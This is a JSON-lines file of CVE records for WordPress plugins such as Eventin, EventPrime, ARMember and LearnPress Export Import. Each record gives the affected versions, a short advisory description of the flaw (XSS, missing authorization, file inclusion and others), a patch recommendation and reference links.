{"CVE_ID":"CVE-2024-9609","slug":"learnpress-import-export","versionImpact":"4.0.4","versionEndExcluding":"4.0.5","description":"The LearnPress Export Import \u2013 WordPress extension for LearnPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'learnpress_import_form_server' parameter in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7429367-f9f4-4859-9537-0f543e32870a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7429367-f9f4-4859-9537-0f543e32870a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/views\\\/import.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/views\\\/import.php#L23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/providers\\\/learnpress\\\/class-lp-import-learnpress.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/providers\\\/learnpress\\\/class-lp-import-learnpress.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186901\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/views\\\/import.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186901\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/views\\\/import.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186901\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/providers\\\/learnpress\\\/class-lp-import-learnpress.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186901\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/providers\\\/learnpress\\\/class-lp-import-learnpress.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6033","slug":"wp-event-solution","versionImpact":"4.0.4","versionEndExcluding":"4.0.5","description":"The Event Manager, Events Calendar, Tickets, Registrations \u2013 Eventin plugin for WordPress is vulnerable to unauthorized data importation due to a missing capability check on the 'import_file' function in all versions up to, and including, 4.0.4. This makes it possible for authenticated attackers, with Contributor-level access and above, to import events, speakers, schedules and attendee data.","recommendation":"Update to version 4.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1725c7f3-2fac-4714-a63e-6c43694483fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1725c7f3-2fac-4714-a63e-6c43694483fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/core\\\/admin\\\/hooks.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/core\\\/admin\\\/hooks.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3117477\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3117477\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9865","slug":"eventprime-event-calendar-management","versionImpact":"4.0.4.7","versionEndExcluding":"4.0.4.8","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018ep_booking_attendee_fields\u2019 fields in all versions up to, and including, 4.0.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the transaction log for a booking.","recommendation":"Update to version 4.0.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18ded977-5297-4b6f-b9f3-0567f995d08a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18ded977-5297-4b6f-b9f3-0567f995d08a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168585%40eventprime-event-calendar-management&new=3168585%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168585%40eventprime-event-calendar-management&new=3168585%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170503\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170503\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9864","slug":"eventprime-event-calendar-management","versionImpact":"4.0.4.7","versionEndExcluding":"4.0.4.8","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ticket names in all versions up to, and including, 4.0.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is only exploitable when front-end users can submit new events with tickets.","recommendation":"Update to version 4.0.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc2a66cb-ad13-428f-a25a-b2807450aa16?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc2a66cb-ad13-428f-a25a-b2807450aa16?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170503\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170503\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3474","slug":"mwp-skype","versionImpact":"4.0.3","versionEndExcluding":"4.0.4","description":"The Wow Skype Buttons WordPress plugin before 4.0.4 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks","recommendation":"Update to version 4.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5c3e145-6738-4d85-8507-43ca1b1d5877\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5c3e145-6738-4d85-8507-43ca1b1d5877\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4796","slug":"wp-event-solution","versionImpact":"4.0.34","versionEndExcluding":"4.0.35","description":"The Eventin plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.0.34. This is due to the plugin not properly validating a user's identity or capability prior to updating their details like email in the 'Eventin\\Speaker\\Api\\SpeakerController::update_item' function. This makes it possible for unauthenticated attackers with contributor-level and above permissions to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"Update to version 4.0.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.28\\\/core\\\/speaker\\\/Api\\\/SpeakerController.php#L419\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.28\\\/core\\\/speaker\\\/Api\\\/SpeakerController.php#L419\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336972\\\/wp-event-solution\\\/trunk\\\/core\\\/speaker\\\/Api\\\/SpeakerController.php#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336972\\\/wp-event-solution\\\/trunk\\\/core\\\/speaker\\\/Api\\\/SpeakerController.php#file0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e0d441d-1da5-45e7-8a14-ce178099c0cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e0d441d-1da5-45e7-8a14-ce178099c0cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4133","slug":"armember-membership","versionImpact":"4.0.30","versionEndExcluding":"4.0.31","description":"The ARMember \u2013 Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 4.0.30. This is due to insufficient validation on the redirect url supplied via the redirect_to parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"Update to version 4.0.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80d113aa-7401-4b58-a755-f64146d9fb08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80d113aa-7401-4b58-a755-f64146d9fb08?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078683%40armember-membership%2Ftrunk&old=3069538%40armember-membership%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078683%40armember-membership%2Ftrunk&old=3069538%40armember-membership%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5775","slug":"backwpup","versionEndExcluding":"4.0.3","description":"The BackWPup plugin for WordPress is vulnerable to Plaintext Storage of Backup Destination Password in all versions up to, and including, 4.0.2. This is due to to the plugin improperly storing backup destination passwords in plaintext. This makes it possible for authenticated attackers, with administrator-level access, to retrieve the password from the password input field in the UI or from the options table where the password is stored.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4bce4f04-e622-468a-ac7e-5903ad50cc13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4bce4f04-e622-468a-ac7e-5903ad50cc13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039678\\\/backwpup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039678\\\/backwpup\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10672","slug":"multiple-pages-generator-by-porthas","versionImpact":"4.0.2","versionEndExcluding":"4.0.3","description":"The Multiple Page Generator Plugin \u2013 MPG plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the mpg_upsert_project_source_block() function in all versions up to, and including, 4.0.2. This makes it possible for authenticated attackers, with editor-level access and above, to delete limited files on the server.","recommendation":"Update to version 4.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c21de03-4d62-4ecf-a2f1-57e0e416792b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c21de03-4d62-4ecf-a2f1-57e0e416792b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/tags\\\/3.4.8\\\/controllers\\\/ProjectController.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/tags\\\/3.4.8\\\/controllers\\\/ProjectController.php#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/tags\\\/3.4.8\\\/controllers\\\/ProjectController.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/tags\\\/3.4.8\\\/controllers\\\/ProjectController.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183330\\\/multiple-pages-generator-by-porthas\\\/tags\\\/4.0.3\\\/controllers\\\/ProjectController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183330\\\/multiple-pages-generator-by-porthas\\\/tags\\\/4.0.3\\\/controllers\\\/ProjectController.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7621","slug":"atarim-visual-collaboration","versionImpact":"4.0.2","versionEndExcluding":"4.0.3","description":"The Visual Website Collaboration, Feedback & Project Management \u2013 Atarim plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the process_wpfeedback_misc_options() function in all versions up to, and including, 4.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugins settings which can also be leveraged to gain access to the plugin's settings.","recommendation":"Update to version 4.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f17e055-ad49-4115-89c5-dd76b6c531f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f17e055-ad49-4115-89c5-dd76b6c531f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_function.php?rev=3116009#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_function.php?rev=3116009#L235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133163\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_function.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133163\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_function.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3419","slug":"wp-event-solution","versionImpact":"4.0.26","versionEndExcluding":"4.0.27","description":"The Event Manager, Events Calendar, Tickets, Registrations \u2013 Eventin plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 4.0.26 via the proxy_image() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 4.0.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284545\\\/wp-event-solution\\\/trunk\\\/core\\\/Admin\\\/Hooks.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284545\\\/wp-event-solution\\\/trunk\\\/core\\\/Admin\\\/Hooks.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1479071c-85c3-41fd-8ad7-f0dee32f201b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1479071c-85c3-41fd-8ad7-f0dee32f201b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1770","slug":"wp-event-solution","versionImpact":"4.0.24","versionEndExcluding":"4.0.25","description":"The Event Manager, Events Calendar, Tickets, Registrations \u2013 Eventin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.0.24 via the 'style' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 4.0.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.24\\\/widgets\\\/events-calendar\\\/events-calendar.php#L715\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.24\\\/widgets\\\/events-calendar\\\/events-calendar.php#L715\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.24\\\/widgets\\\/upcoming-event-tab\\\/style\\\/tab-1.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.24\\\/widgets\\\/upcoming-event-tab\\\/style\\\/tab-1.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257023\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257023\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f24baee-7003-449b-9072-d95fa1e26c8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f24baee-7003-449b-9072-d95fa1e26c8f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1766","slug":"wp-event-solution","versionImpact":"4.0.24","versionEndExcluding":"4.0.25","description":"The Event Manager, Events Calendar, Tickets, Registrations \u2013 Eventin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'payment_complete' function in all versions up to, and including, 4.0.24. This makes it possible for unauthenticated attackers to update the status of ticket payments to 'completed', possibly resulting in financial loss.","recommendation":"Update to version 4.0.25, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.24\\\/core\\\/Order\\\/PaymentController.php#L97\",\"name\":\"http:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.24\\\/core\\\/Order\\\/PaymentController.php#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257023\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257023\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2bcaff9-bf04-4d8e-9422-c433264067ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2bcaff9-bf04-4d8e-9422-c433264067ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0969","slug":"armember-membership","versionImpact":"4.0.24","versionEndExcluding":"4.0.25","description":"The ARMember plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's \"Default Restriction\" feature and view restricted post content.","recommendation":"Update to version 4.0.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030044\\\/armember-membership\\\/trunk\\\/core\\\/classes\\\/class.arm_restriction.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030044\\\/armember-membership\\\/trunk\\\/core\\\/classes\\\/class.arm_restriction.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-52731","slug":"eventin-pro","versionImpact":"4.0.24","versionEndExcluding":"4.0.25","description":"Missing Authorization vulnerability in themefunction WordPress Event Manager, Event Calendar and Booking Plugin allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WordPress Event Manager, Event Calendar and Booking Plugin: from n\/a through 4.0.24.","recommendation":"Update to version 4.0.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/eventin-pro\\\/vulnerability\\\/wordpress-wordpress-event-manager-event-calendar-and-booking-plugin-plugin-4-0-24-arbitrary-content-deletion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/eventin-pro\\\/vulnerability\\\/wordpress-wordpress-event-manager-event-calendar-and-booking-plugin-plugin-4-0-24-arbitrary-content-deletion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-52730","slug":"eventin-pro","versionImpact":"4.0.24","versionEndExcluding":"4.0.25","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themefunction WordPress Event Manager, Event Calendar and Booking Plugin allows Stored XSS. This issue affects WordPress Event Manager, Event Calendar and Booking Plugin: from n\/a through 4.0.24.","recommendation":"Update to version 4.0.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/eventin-pro\\\/vulnerability\\\/wordpress-wordpress-event-manager-event-calendar-and-booking-plugin-plugin-4-0-24-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/eventin-pro\\\/vulnerability\\\/wordpress-wordpress-event-manager-event-calendar-and-booking-plugin-plugin-4-0-24-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3239","slug":"ultimate-post","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The Post Grid Gutenberg Blocks and WordPress Blog Plugin  WordPress plugin before 4.0.2 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfa1421b-41b0-4b25-95ef-0843103e1f5e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfa1421b-41b0-4b25-95ef-0843103e1f5e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7424","slug":"multiple-pages-generator-by-porthas","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The Multiple Page Generator Plugin \u2013 MPG plugin for WordPress is vulnerable to unauthorized modification of and access to data due to a missing capability check on several functions in all versions up to, and including, 4.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to invoke those functions intended for admin use resulting in subscribers being able to upload csv files and view the contents of MPG projects.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/860848c1-dd67-4baf-a571-bc866c5f12f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/860848c1-dd67-4baf-a571-bc866c5f12f8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/controllers\\\/DatasetController.php#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/controllers\\\/DatasetController.php#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/models\\\/ProjectModel.php#L286\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/models\\\/ProjectModel.php#L286\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174918\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/controllers\\\/DatasetController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174918\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/controllers\\\/DatasetController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174918\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/models\\\/ProjectModel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174918\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/models\\\/ProjectModel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3178830%40multiple-pages-generator-by-porthas%2Ftrunk&old=3174918%40multiple-pages-generator-by-porthas%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3178830%40multiple-pages-generator-by-porthas%2Ftrunk&old=3174918%40multiple-pages-generator-by-porthas%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"side-menu-lite","versionEndExcluding":"4.0.2","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"mwp-skype","versionEndExcluding":"4.0.2","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
